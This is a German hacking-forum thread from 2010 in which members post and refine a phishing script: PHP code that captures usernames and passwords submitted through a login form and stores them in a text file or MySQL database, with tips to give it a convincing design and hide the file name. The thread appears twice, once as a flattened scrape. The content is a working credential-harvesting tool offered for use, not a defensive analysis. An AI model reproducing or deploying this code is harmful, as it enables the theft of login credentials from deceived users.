Phishing - Unique-Crew

Flav · 20. November 2010, 13:09

Ein Phishing-Script ist eigentlich ganz einfach aufgebaut: Man fängt die Eingabe des Users ab und speichert diese in einer Datei oder einer Datenbank.

Benutzername + Passwort abfangen

PHP-Code:


			
$benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null;
$passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null;

Mit isset($_POST["benutzername"]) bzw. isset($_POST["passwort"]) überprüfen wir, ob die Eingabe existiert um den Aufruf einer nicht existierenden Variable zu verhindern.

Eingaben in einer Datei speichern

PHP-Code:


			
$handle = fopen("accounts.txt", "a");
fwrite($handle, "Benutzername: $benutzername\r\nPasswort: $passwort\r\n\r\n");
????: Unique-Crew | Cause we are unique ! http://unique-crew.net/showthread.php?t=554
fclose($handle);

fopen öffnet eine Datei "accounts.txt". Das "a" heißt, dass die Datei zum Schreiben geöffnet wird und der Dateizeiger am Ende der Datei positioniert wird. Existiert die Datei nicht, wird versucht sie neu anzulegen.
fwrite schreibt etwas in die Datei. "\r\n" bedeutet so viel wie Zeilenumbruch.
fclose schließt die Datei.

Das war dann auch schon alles, das fertige Script sieht wie folgt aus:

PHP-Code:


			
<?php
// Eingaben abfangen
$benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null;
$passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null;

// Eingaben in einer Datei speichern
$handle = fopen("accounts.txt", "a");
fwrite($handle, "Benutzername: $benutzername\r\nPasswort: $passwort\r\n\r\n");
fclose($handle);
?>

Man kann natürlich auch noch überprüfen, ob die Eingabe nicht NULL ist um zu verhindern, dass leere Eingaben gespeichert werden.

PHP-Code:


			
<?php
// Eingaben abfangen
$benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null;
$passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null;

if ($benutzername != null && $passwort != null) {
    // Eingaben in einer Datei speichern
    $handle = fopen("accounts.txt", "a");
    fwrite($handle, "Benutzername: $benutzername\r\nPasswort: $passwort\r\n\r\n");
    fclose($handle);
}
?>

Die Eingabe erfolgt über ein Formular.

HTML-Code:

<form method="post" action="phishing.php">
<input type="text" name="benutzername">
<input type="password" name="passwort">
<input type="submit">
</form>

Es empfiehlt sich natürlich die Datei nicht phishing.php zu nennen.

Bueno · 20. November 2010, 13:33

Jetzt muss man das ganze natürlich noch in ein ordentliches Design packen...

Sehr gut erklärt für PHP Anfänger.
Wenn man etwas mehr Ahnung von PHP/Mysql hat, würde ich das ganze in eine Datenbank schreiben. Ist meiner Meinung nach einfacher und auch sicherer. Naja. Ansichtssache.

greetZ

nginx · 20. November 2010, 13:53

Zitat:

Zitat von Bueno

[...]
Wenn man etwas mehr Ahnung von PHP/Mysql hat, würde ich das ganze in eine Datenbank schreiben. Ist meiner Meinung nach einfacher und auch sicherer. Naja. Ansichtssache.

Das sollte dann ganz einfach über:

Code:

<?php
$User = $_POST['benutzername'];
$Pass = $_POST['passwort'];
mysql_query("INSERT INTO Testtab1 (User, Pass) VALUES ('$User', '$Pass')");
?>

funktionieren, für die, die es interessiert.

@Flav: dein kleines Tutorial finde ich sehr gut, da es komplett von dir kommentiert & erklärt wird. Weiter so.

Flav · 20. November 2010, 15:01

PHP-Code:


			
<?php

// Eingaben abfangen

$benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null;

$passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null;



if ($benutzername != null && $passwort != null) {

    // Eingaben in einer Datenbank speichern

    $con = mysql_connect("localhost:3306", "root", "");

    mysql_select_db("phishing", $con);

    mysql_query(sprintf('INSERT INTO `accounts` (`benutzername`, `passwort`) VALUES("%s", "%s")', mysql_real_escape_string($benutzername), mysql_real_escape_string($passwort)));

    mysql_close($con);

}

?>

Eher so, einfach den Host, Benutzername, Passwort und Datenbank anpassen. Allerdings finde ich Datenbanken bei so geringer Datenmenge sinnlos.

20. November 2010, 13:09	#1
Flav Junior Member Registriert seit: Nov 2010 Beiträge: 5 : 0 For This Post 1 Gesamt	Phishing Ein Phishing-Script ist eigentlich ganz einfach aufgebaut: Man fängt die Eingabe des Users ab und speichert diese in einer Datei oder einer Datenbank. Benutzername + Passwort abfangen PHP-Code: `$benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null; $passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null;` Mit isset($_POST["benutzername"]) bzw. isset($_POST["passwort"]) überprüfen wir, ob die Eingabe existiert um den Aufruf einer nicht existierenden Variable zu verhindern. Eingaben in einer Datei speichern PHP-Code: `$handle = fopen("accounts.txt", "a"); fwrite($handle, "Benutzername: $benutzername\r\nPasswort: $passwort\r\n\r\n"); ????: Unique-Crew \| Cause we are unique ! http://unique-crew.net/showthread.php?t=554 fclose($handle);` fopen öffnet eine Datei "accounts.txt". Das "a" heißt, dass die Datei zum Schreiben geöffnet wird und der Dateizeiger am Ende der Datei positioniert wird. Existiert die Datei nicht, wird versucht sie neu anzulegen. fwrite schreibt etwas in die Datei. "\r\n" bedeutet so viel wie Zeilenumbruch. fclose schließt die Datei. Das war dann auch schon alles, das fertige Script sieht wie folgt aus: PHP-Code: `<?php // Eingaben abfangen $benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null; $passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null; // Eingaben in einer Datei speichern $handle = fopen("accounts.txt", "a"); fwrite($handle, "Benutzername: $benutzername\r\nPasswort: $passwort\r\n\r\n"); fclose($handle); ?>` Man kann natürlich auch noch überprüfen, ob die Eingabe nicht NULL ist um zu verhindern, dass leere Eingaben gespeichert werden. PHP-Code: `<?php // Eingaben abfangen $benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null; $passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null; if ($benutzername != null && $passwort != null) { // Eingaben in einer Datei speichern $handle = fopen("accounts.txt", "a"); fwrite($handle, "Benutzername: $benutzername\r\nPasswort: $passwort\r\n\r\n"); fclose($handle); } ?>` Die Eingabe erfolgt über ein Formular. HTML-Code: <form method="post" action="phishing.php"> <input type="text" name="benutzername"> <input type="password" name="passwort"> <input type="submit"> </form> Es empfiehlt sich natürlich die Datei nicht phishing.php zu nennen. Geändert von Flav (20. November 2010 um 13:12 Uhr)

20. November 2010, 13:33	#2
Bueno Level 1 User Registriert seit: Nov 2010 Ort: im schönen Norden (: Beiträge: 43 : 0 For This Post 13 Gesamt	AW: Phishing Jetzt muss man das ganze natürlich noch in ein ordentliches Design packen... Sehr gut erklärt für PHP Anfänger. Wenn man etwas mehr Ahnung von PHP/Mysql hat, würde ich das ganze in eine Datenbank schreiben. Ist meiner Meinung nach einfacher und auch sicherer. Naja. Ansichtssache. greetZ __________________ To view links or images in signatures your post count must be 1 or greater. You currently have 0 posts. ICQ: 957605[eins]

20. November 2010, 15:01	#4
Flav Junior Member Registriert seit: Nov 2010 Beiträge: 5 : 0 For This Post 1 Gesamt	AW: Phishing PHP-Code: <?php // Eingaben abfangen $benutzername = isset($_POST["benutzername"]) ? $_POST["benutzername"] : null; $passwort = isset($_POST["passwort"]) ? $_POST["passwort"] : null; if ($benutzername != null && $passwort != null) { // Eingaben in einer Datenbank speichern $con = mysql_connect("localhost:3306", "root", ""); mysql_select_db("phishing", $con); mysql_query(sprintf('INSERT INTO `accounts` (`benutzername`, `passwort`) VALUES("%s", "%s")', mysql_real_escape_string($benutzername), mysql_real_escape_string($passwort))); mysql_close($con); } ?> Eher so, einfach den Host, Benutzername, Passwort und Datenbank anpassen. Allerdings finde ich Datenbanken bei so geringer Datenmenge sinnlos.

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)